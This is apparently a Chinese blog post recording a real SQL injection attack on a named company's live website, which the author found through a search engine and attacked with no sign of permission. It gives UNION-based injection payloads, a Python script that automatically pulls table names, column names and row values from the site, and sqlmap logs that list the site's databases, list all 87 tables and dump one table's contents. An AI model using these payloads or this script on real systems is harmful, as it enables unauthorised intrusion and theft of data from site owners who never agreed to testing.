字符型的SQL注入

Zss 发表于:

1.想这找一个网站来测是sql注入,使用谷歌还是搜到了一些,测试网站是http://www.calin.com.tw/ab.php?id=1&item_id=33

首先做一次常规性测试,加个’号测试,发现不止是报错,而且来年报错的语句都显示出来了,真是幸运

Can’t execute query

SELECT * FROM about_content_tw WHERE available=’1′ and id = ’33”

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”33”’ at line 1

This script cannot continue, terminating.

 

2.查看到报错可以判断这是字符型的注入漏洞,与使用order by来测试此表总字段数

发现网站均正常,所以也就不使用这个语句来判断几个字段了,直接使用union来猜

 

3.使用’ and 1=2 union select 1,2,3,USER(),DATABASE(),VERSION() or ‘1’=’1′  测试发现This script cannot continue, terminating.说明字段数量不对

那么再次加1,就是7个字段不报错,所以此表的字段总数为7个,那么语句为

' and 1=2 union select 1,2,3,USER(),DATABASE(),VERSION(),7 or '1'='1

此时正常查询出数据库为:dbcalin  当前的用户为:dbcalin@localhost

 

4.再查询表名,由于是需要使用到limit来控制输出的行数,那么使用 — ss来注释掉最后的’号

' and 1=2 union select 1,2,3,4,TABLE_NAME,6,7 from information_schema.TABLES where TABLE_SCHEMA='dbcalin' limit 0,1 -- ss

依次修改limit 来控制输出不同的表名,这太多了,之后就用脚本来跑

 

5.再就是查询字段了,修改下面的表名查询不同的表,修改limit输出不同的列,也是用脚本来自动跑

' and 1=2 union select 1,2,3,4,column_name,6,7 from information_schema.COLUMNs where TABLE_SCHEMA='dbcalin' and table_name='about_content_eng' limit 0,1 -- ss

 

6.再就是查询内容了

' and 1=2 union select 1,2,3,title,content,6,7 from dbcalin.about_content_eng LIMIT 0,1 -- ss

 

7.之后写了一个脚本来自动构造这些url注入,依次输出这些表的所有字段的值,不过好像他这个没得后台管理地址,当然也可能在别的库中,不过应该不会这么做,所以推测根本没后台吧

#coding:utf-8

from lxml import etree
import requests,sys
reload(sys)
sys.setdefaultencoding('gbk')

def talbes(db_name):
    i = 0
    print '-' * 10 + '   正在获取%s数据库中的表...   '%db_name + '-' * 10
    while 1:
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,TABLE_NAME,6,7 from information_schema.TABLES where TABLE_SCHEMA='%s' limit %d,1 -- ss"""%(db_name,i)
        rsp = requests.get(url).content
        xml = etree.HTML(rsp)
        tables = str(xml.xpath('//*[@id="h6"]/div[2]/div[3]/text()')[0])
        tables = tables.strip('\n').strip('\t').strip()
        i += 1
        if len(tables) == 0:
            break
        else:
            print '数据库:%s  第%d张表:%s' % (db_name, i, tables)
            tables_list.append((db_name,tables))
    print '-' * 10 + '   获取完成!!!  %s数据库总共%d张表!!!   '%(db_name,len(tables_list)) + '-' * 10 + '\n'
    return tables_list


def columns(db_tb_name):
    i = 0
    print '-' * 10 + '   正在获取%s数据库中%s表的所有字段...   '%(db_tb_name[0],db_tb_name[1]) + '-' * 10
    while 1:
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,column_name,6,7 from information_schema.COLUMNs where TABLE_SCHEMA='%s' and table_name='%s' limit %d,1-- ss""" %(db_tb_name[0],db_tb_name[1],i)
        rsp = requests.get(url).content
        xml = etree.HTML(rsp)
        column = xml.xpath('//*[@id="h6"]/div[2]/div[3]/text()')[0]
        i += 1
        column = column.strip('\n').strip('\t').strip()
        if len(column) == 0:
            break
        else:
            print '数据库:%s  表:%s  第%d个字段:%s' % (db_tb_name[0], db_tb_name[1],i,column)
            colums_list.append((db_tb_name[0],db_tb_name[1],column))
    print '-' * 10 + '   获取完成!!!  %s数据库总共%s表总共%d个字段!!!   '%(db_tb_name[0], db_tb_name[1],len(tables_list)) + '-' * 10 + '\n'
    return colums_list

def value(db_tb_cl_name):
    i = 0
    #获取多少行
    url1 = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,count(*),6,7 from %s.%s LIMIT %d,1 -- ss""" % (db_tb_cl_name[0], db_tb_cl_name[1], i)
    rsp1 = requests.get(url1).content
    xml1 = etree.HTML(rsp1)
    values1 = xml1.xpath('//*[@id="h6"]/div[2]/div[3]/text()')[0]
    values1 = int(values1.strip('\n').strip('\t').strip())

    for i in range(values1):
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,%s,6,7 from %s.%s LIMIT %d,1 -- ss""" %(db_tb_cl_name[2],db_tb_cl_name[0],db_tb_cl_name[1],i)
        rsp = requests.get(url).content
        xml = etree.HTML(rsp)
        values = xml.xpath('//*[@id="h6"]/div[2]/div[3]/text()')[0]
        values = values.strip('\n').strip('\t').strip()
        i =+ 1
        if len(values) == 0:
            break
        else:
            print '%s表 %s字段的值:%s'%(db_tb_cl_name[1],db_tb_cl_name[2],str(values).encode('utf-8'))


if __name__ == '__main__':
    tables_list = []
    colums_list = []
    # # tables_list = talbes('dbcalin')
    tables_list = [('dbcalin','financial_sales_tw'),('dbcalin','financial_sales_eng')]
    for table in tables_list:
        columns(table)
    for column in colums_list:
        value(column)

8.另外在使用sqlmap扫描一顿,发现和自己手动注入的结果一致,不过url改成了 http://www.calin.com.tw/ab.php?item_id=33,只有一个参数

root@MiWiFi-R3L-srv:~# sqlmap -u 
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:37:44 /2019-05-31/

[17:37:46] [INFO] testing connection to the target URL
[17:37:46] [INFO] testing if the target URL content is stable
[17:37:47] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[17:37:49] [INFO] testing if GET parameter 'item_id' is dynamic
[17:37:49] [WARNING] GET parameter 'item_id' does not appear to be dynamic
[17:37:54] [INFO] heuristics detected web page charset 'ascii'
[17:37:54] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'MySQL')
[17:37:54] [INFO] heuristic (XSS) test shows that GET parameter 'item_id' might be vulnerable to cross-site scripting (XSS) attacks
[17:37:54] [INFO] testing for SQL injection on GET parameter 'item_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:38:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:38:01] [WARNING] reflective value(s) found and filtering out
[17:38:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:38:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:38:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:38:10] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:38:15] [INFO] GET parameter 'item_id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[17:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:38:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:38:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:38:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:38:15] [INFO] GET parameter 'item_id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[17:38:15] [INFO] testing 'MySQL inline queries'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:38:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:38:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:38:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:38:16] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[17:39:16] [INFO] GET parameter 'item_id' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[17:39:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:39:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:39:17] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:39:18] [INFO] target URL appears to have 7 columns in query
[17:39:20] [INFO] target URL appears to be UNION injectable with 7 columns
[17:39:20] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[17:39:20] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 196 HTTP(s) requests:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:41:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:41:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:41:36 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:41:52 /2019-05-31/

[17:41:53] [INFO] resuming back-end DBMS 'mysql'
[17:41:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:41:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:41:53] [INFO] fetching database names
[17:41:53] [INFO] used SQL query returns 2 entries
[17:41:53] [INFO] retrieved: 'information_schema'
[17:41:54] [INFO] retrieved: 'dbcalin'
available databases [2]:
[*] dbcalin
[*] information_schema

[17:41:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:41:54 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 -D "dbcalin" --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:42:15 /2019-05-31/

[17:42:16] [INFO] resuming back-end DBMS 'mysql'
[17:42:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:42:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:42:16] [INFO] fetching tables for database: 'dbcalin'
[17:42:16] [INFO] used SQL query returns 87 entries
[17:42:16] [INFO] retrieved: 'about_content_eng'
[17:42:16] [INFO] retrieved: 'about_content_jp'
[17:42:16] [INFO] retrieved: 'about_content_tw'
[17:42:16] [INFO] retrieved: 'about_us_eng'
[17:42:16] [INFO] retrieved: 'about_us_jp'
[17:42:16] [INFO] retrieved: 'about_us_tw'
[17:42:16] [INFO] retrieved: 'categories_eng'
[17:42:16] [INFO] retrieved: 'categories_jp'
[17:42:17] [INFO] retrieved: 'categories_tw'
[17:42:17] [INFO] retrieved: 'company_explain_eng'
[17:42:17] [INFO] retrieved: 'company_explain_jp'
[17:42:17] [INFO] retrieved: 'company_explain_tw'
[17:42:17] [INFO] retrieved: 'company_info_eng'
[17:42:17] [INFO] retrieved: 'company_info_jp'
[17:42:17] [INFO] retrieved: 'company_info_tw'
[17:42:17] [INFO] retrieved: 'contact_us_eng'
[17:42:17] [INFO] retrieved: 'contact_us_items_eng'
[17:42:17] [INFO] retrieved: 'contact_us_items_jp'
[17:42:17] [INFO] retrieved: 'contact_us_items_tw'
[17:42:17] [INFO] retrieved: 'contact_us_jp'
[17:42:17] [INFO] retrieved: 'contact_us_tw'
[17:42:18] [INFO] retrieved: 'country_actuarial_eng'
[17:42:18] [INFO] retrieved: 'country_actuarial_jp'
[17:42:18] [INFO] retrieved: 'country_actuarial_tw'
[17:42:18] [INFO] retrieved: 'financial_event_eng'
[17:42:18] [INFO] retrieved: 'financial_event_jp'
[17:42:18] [INFO] retrieved: 'financial_event_tw'
[17:42:18] [INFO] retrieved: 'financial_explain_eng'
[17:42:18] [INFO] retrieved: 'financial_explain_jp'
[17:42:18] [INFO] retrieved: 'financial_explain_tw'
[17:42:18] [INFO] retrieved: 'financial_report_eng'
[17:42:18] [INFO] retrieved: 'financial_report_jp'
[17:42:19] [INFO] retrieved: 'financial_report_tw'
[17:42:19] [INFO] retrieved: 'financial_sales_eng'
[17:42:19] [INFO] retrieved: 'financial_sales_jp'
[17:42:19] [INFO] retrieved: 'financial_sales_tw'
[17:42:19] [INFO] retrieved: 'footer_info_eng'
[17:42:19] [INFO] retrieved: 'footer_info_jp'
[17:42:19] [INFO] retrieved: 'footer_info_tw'
[17:42:19] [INFO] retrieved: 'header_info_eng'
[17:42:19] [INFO] retrieved: 'header_info_jp'
[17:42:19] [INFO] retrieved: 'header_info_tw'
[17:42:19] [INFO] retrieved: 'login_log_eng'
[17:42:20] [INFO] retrieved: 'login_log_jp'
[17:42:20] [INFO] retrieved: 'login_log_tw'
[17:42:20] [INFO] retrieved: 'managers_eng'
[17:42:20] [INFO] retrieved: 'managers_jp'
[17:42:20] [INFO] retrieved: 'managers_tw'
[17:42:20] [INFO] retrieved: 'page_counter_eng'
[17:42:20] [INFO] retrieved: 'page_counter_jp'
[17:42:20] [INFO] retrieved: 'page_counter_tw'
[17:42:20] [INFO] retrieved: 'pro_views_eng'
[17:42:21] [INFO] retrieved: 'pro_views_jp'
[17:42:21] [INFO] retrieved: 'pro_views_tw'
[17:42:21] [INFO] retrieved: 'products_content_eng'
[17:42:21] [INFO] retrieved: 'products_content_jp'
[17:42:21] [INFO] retrieved: 'products_content_tw'
[17:42:21] [INFO] retrieved: 'products_eng'
[17:42:22] [INFO] retrieved: 'products_image_eng'
[17:42:22] [INFO] retrieved: 'products_image_jp'
[17:42:22] [INFO] retrieved: 'products_image_tw'
[17:42:22] [INFO] retrieved: 'products_jp'
[17:42:22] [INFO] retrieved: 'products_tw'
[17:42:22] [INFO] retrieved: 'referer_eng'
[17:42:22] [INFO] retrieved: 'referer_jp'
[17:42:22] [INFO] retrieved: 'referer_tw'
[17:42:22] [INFO] retrieved: 'shareholder_dividend_eng'
[17:42:22] [INFO] retrieved: 'shareholder_dividend_jp'
[17:42:23] [INFO] retrieved: 'shareholder_dividend_tw'
[17:42:23] [INFO] retrieved: 'shareholder_manual_eng'
[17:42:23] [INFO] retrieved: 'shareholder_manual_jp'
[17:42:23] [INFO] retrieved: 'shareholder_manual_tw'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_eng'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_jp'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_tw'
[17:42:23] [INFO] retrieved: 'shareholder_notice_eng'
[17:42:23] [INFO] retrieved: 'shareholder_notice_jp'
[17:42:23] [INFO] retrieved: 'shareholder_notice_tw'
[17:42:23] [INFO] retrieved: 'shareholder_report_eng'
[17:42:23] [INFO] retrieved: 'shareholder_report_jp'
[17:42:23] [INFO] retrieved: 'shareholder_report_tw'
[17:42:24] [INFO] retrieved: 'shareholder_topten_eng'
[17:42:24] [INFO] retrieved: 'shareholder_topten_jp'
[17:42:24] [INFO] retrieved: 'shareholder_topten_tw'
[17:42:24] [INFO] retrieved: 'system_info_eng'
[17:42:24] [INFO] retrieved: 'system_info_jp'
[17:42:24] [INFO] retrieved: 'system_info_tw'
Database: dbcalin
[87 tables]
+--------------------------+
| about_content_eng        |
| about_content_jp         |
| about_content_tw         |
| about_us_eng             |
| about_us_jp              |
| about_us_tw              |
| categories_eng           |
| categories_jp            |
| categories_tw            |
| company_explain_eng      |
| company_explain_jp       |
| company_explain_tw       |
| company_info_eng         |
| company_info_jp          |
| company_info_tw          |
| contact_us_eng           |
| contact_us_items_eng     |
| contact_us_items_jp      |
| contact_us_items_tw      |
| contact_us_jp            |
| contact_us_tw            |
| country_actuarial_eng    |
| country_actuarial_jp     |
| country_actuarial_tw     |
| financial_event_eng      |
| financial_event_jp       |
| financial_event_tw       |
| financial_explain_eng    |
| financial_explain_jp     |
| financial_explain_tw     |
| financial_report_eng     |
| financial_report_jp      |
| financial_report_tw      |
| financial_sales_eng      |
| financial_sales_jp       |
| financial_sales_tw       |
| footer_info_eng          |
| footer_info_jp           |
| footer_info_tw           |
| header_info_eng          |
| header_info_jp           |
| header_info_tw           |
| login_log_eng            |
| login_log_jp             |
| login_log_tw             |
| managers_eng             |
| managers_jp              |
| managers_tw              |
| page_counter_eng         |
| page_counter_jp          |
| page_counter_tw          |
| pro_views_eng            |
| pro_views_jp             |
| pro_views_tw             |
| products_content_eng     |
| products_content_jp      |
| products_content_tw      |
| products_eng             |
| products_image_eng       |
| products_image_jp        |
| products_image_tw        |
| products_jp              |
| products_tw              |
| referer_eng              |
| referer_jp               |
| referer_tw               |
| shareholder_dividend_eng |
| shareholder_dividend_jp  |
| shareholder_dividend_tw  |
| shareholder_manual_eng   |
| shareholder_manual_jp    |
| shareholder_manual_tw    |
| shareholder_meeting_eng  |
| shareholder_meeting_jp   |
| shareholder_meeting_tw   |
| shareholder_notice_eng   |
| shareholder_notice_jp    |
| shareholder_notice_tw    |
| shareholder_report_eng   |
| shareholder_report_jp    |
| shareholder_report_tw    |
| shareholder_topten_eng   |
| shareholder_topten_jp    |
| shareholder_topten_tw    |
| system_info_eng          |
| system_info_jp           |
| system_info_tw           |
+--------------------------+

[17:42:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:42:24 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 -D "dbcalin" -T "products_image_eng" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:44:04 /2019-05-31/

[17:44:04] [INFO] resuming back-end DBMS 'mysql' 
[17:44:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:44:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:44:05] [INFO] fetching columns for table 'products_image_eng' in database 'dbcalin'
[17:44:05] [INFO] used SQL query returns 7 entries
[17:44:05] [INFO] retrieved: 'id','int(11)'
[17:44:05] [INFO] retrieved: 'item_id','int(11)'
[17:44:05] [INFO] retrieved: 'title','varchar(100)'
[17:44:05] [INFO] retrieved: 'image','varchar(50)'
[17:44:05] [INFO] retrieved: 'tempSet','enum('0','1')'
[17:44:05] [INFO] retrieved: 'coverSet','enum('0','1')'
[17:44:05] [INFO] retrieved: 'createDate','datetime'
[17:44:05] [INFO] fetching entries for table 'products_image_eng' in database 'dbcalin'                                                            
[17:44:05] [INFO] used SQL query returns 7 entries
[17:44:05] [INFO] retrieved: '1','2012-10-29 15:40:49','1','1210298881.jpg','1','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:21:19','2','1210295052.jpg','2','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:22:22','3','1210297134.jpg','3','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:22:56','4','1210291332.jpg','4','0',''
[17:44:05] [INFO] retrieved: '1','2016-12-22 13:36:43','7','1612226954.jpg','7','0',''
[17:44:06] [INFO] retrieved: '1','2019-03-25 13:28:09','8','1903256080.jpg','8','0',''
[17:44:06] [INFO] retrieved: '1','2019-03-25 13:36:05','9','1903258634.jpg','9','0',''
Database: dbcalin                                                                                                                                  
Table: products_image_eng
[7 entries]
+----+---------+---------+----------------+---------+----------+---------------------+
| id | item_id | title   | image          | tempSet | coverSet | createDate          |
+----+---------+---------+----------------+---------+----------+---------------------+
| 1  | 1       | <blank> | 1210298881.jpg | 0       | 1        | 2012-10-29 15:40:49 |
| 2  | 2       | <blank> | 1210295052.jpg | 0       | 1        | 2012-10-29 16:21:19 |
| 3  | 3       | <blank> | 1210297134.jpg | 0       | 1        | 2012-10-29 16:22:22 |
| 4  | 4       | <blank> | 1210291332.jpg | 0       | 1        | 2012-10-29 16:22:56 |
| 7  | 7       | <blank> | 1612226954.jpg | 0       | 1        | 2016-12-22 13:36:43 |
| 8  | 8       | <blank> | 1903256080.jpg | 0       | 1        | 2019-03-25 13:28:09 |
| 9  | 9       | <blank> | 1903258634.jpg | 0       | 1        | 2019-03-25 13:36:05 |
+----+---------+---------+----------------+---------+----------+---------------------+

[17:44:06] [INFO] table 'dbcalin.products_image_eng' dumped to CSV file '/root/.sqlmap/output/www.calin.com.tw/dump/dbcalin/products_image_eng.csv'
[17:44:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:44:06 /2019-05-31/